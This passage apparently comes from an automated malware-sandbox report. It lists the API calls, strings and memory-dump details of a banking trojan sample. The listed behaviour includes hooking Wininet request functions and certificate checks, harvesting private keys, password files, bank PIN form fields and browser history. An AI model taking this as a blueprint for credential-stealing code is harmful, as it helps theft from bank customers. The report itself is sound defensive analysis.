                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C), ref: 02BCEB7A
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCEBBD
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCEBC3
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCEBCB
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCEBDC
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCEBE3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCEC1B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCEC28
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C56C,?,?), ref: 02BCEC67
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BCECA5
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCECAC
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCECB4
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02BCECC5
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCECCC
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCED06
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCED31
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02BCED55
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000006), ref: 02BCED72
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCED79
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCED8B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCED9C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDAB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BCEDAE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCEDBB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BCEDBE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 1472338570-1285538368
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                            • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                            • API String ID: 3942648141-1626032180
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                            • String ID: 00-->$<Actions
                                                                                                                                                                                                            • API String ID: 3028510665-1934172683
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$FileOperation$ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: \*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                            • API String ID: 3912299499-4244443412
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: open$taskmgr
                                                                                                                                                                                                            • API String ID: 0-1543563666
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD20EE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C), ref: 02BD212F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C), ref: 02BD216B
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2180
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD218A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2192
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD21A3
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD21AA
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BD21E2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BD21EF
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C,?,?), ref: 02BD2237
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 1668326001-879465215
                                                                                                                                                                                                            • Opcode ID: 28a3a3bd2fd30a7156ce57358e0d152d05d2da9b3f76370a49c8e79bf795301b
                                                                                                                                                                                                            • Instruction ID: a9bba2da42309262e22d092e927aad61981a3ccbe6cfdc271fbfd76bacc4aa35
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28a3a3bd2fd30a7156ce57358e0d152d05d2da9b3f76370a49c8e79bf795301b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD7124309407859FDB618B389C98BEA7BE8EF45740F5489D4FAC5D7242EB709984CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BD1A83
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BD1A92
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BD1AA1
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1ACD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D4A8), ref: 02BD1B03
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02BD1B6C
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD1B76
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD1B7E
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1B8F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD1B96
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD1BA3
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02BD1BCD
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BD1BF2
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02BC8A50), ref: 02BD1C0F
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BD1C29
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02BD1C33
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02BD1C3E
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD1C45
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD1C53
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1C64
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                            • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                            • API String ID: 532458909-2725162336
                                                                                                                                                                                                            • Opcode ID: 41d7b5584d328bfcd5da66bf941e12041d3a1e58055b6381d94a7867e23f73f5
                                                                                                                                                                                                            • Instruction ID: 4b66ed6bf3828670c468bd11d27ae282904578014eca3dcf8c952f234d9b90d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41d7b5584d328bfcd5da66bf941e12041d3a1e58055b6381d94a7867e23f73f5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E251E831A402096BDB259F7C9C98BEF7BA9EF45785F048594FA4AD7100FB70E94487A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,76F8F550,00000000), ref: 02BC11AE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02BC11C4
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,76F91620), ref: 02BC11DC
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02BC11FE
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02BC120A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02BC1220
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02BC123C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02BC1258
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02BC1274
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02BC1290
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02BC12AC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02BC12C8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02BC12E4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02BC1300
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                            • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                            • API String ID: 1705253364-835984666
                                                                                                                                                                                                            • Opcode ID: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                            • Instruction ID: f4f6018f828fddebdedf03968135cdc2f13fb75721a995a6c7ad327438100f9c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 980d486a830d5dd33af5564a1a702f22dc6e65804566d5d2b1a321b415217f91
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8631C374B9070A75FA607A794C02F6F235D8F40E84F3005D8BA46F61A7DBE5E6058978
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD01BE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C878), ref: 02BD01EB
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD022D
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD0233
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD023B
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD024C
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD0253
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C878,?,?), ref: 02BD02C7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02BD0305
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$path.txt
                                                                                                                                                                                                            • API String ID: 2217318736-1213179079
                                                                                                                                                                                                            • Opcode ID: 60a779e99890db1d6ae89f07a9b9decff208815826d2672d054b2691a6203492
                                                                                                                                                                                                            • Instruction ID: 5a0345a2d2781055f3560d8dd16b069c15648128d234aa319462c27b37eac927
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60a779e99890db1d6ae89f07a9b9decff208815826d2672d054b2691a6203492
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5711830A447155FDB619B389858BEB7FE8EF45380F4489D4EAC6D7241EB70DA44CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02BCF05D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF09E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF0D2
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF0E7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF0F1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF0F9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF10A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF111
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF14B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCF158
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670,02BFFDB8,02BFFDB9), ref: 02BCF199
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF1D4
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF1DE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF1E6
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF1F7
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF1FE
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCF23B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCF248
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCF420,02BFFDB8,00000000,00000000), ref: 02BCF27E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCF296
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCF2A7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                            • String ID: pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                            • API String ID: 448721894-2830610617
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02BB4987
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A43
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4A4F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4A64
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4A74
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A88
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4A94
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4AA8
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4AB6
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB4AD5
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BB4AEC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$LockPointerUnlockWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                            • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                            • API String ID: 757183407-427538202
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BCD278
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,found.), ref: 02BCD293
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,asus), ref: 02BCD2AE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260), ref: 02BCD2D4
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD30E
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCD318
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCD320
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD32F
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCD336
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C260,?,?), ref: 02BCD3D9
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCD413
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCD41D
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCD425
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCD434
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCD43B
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 02BCD52F
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02BCD563
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                            • String ID: .txt$.zip$asus$found.$keys$path
                                                                                                                                                                                                            • API String ID: 2233314381-1344788171
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D19C), ref: 02BD4037
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD4075
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD407F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD4087
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD4098
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD409F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,?), ref: 02BD40FD
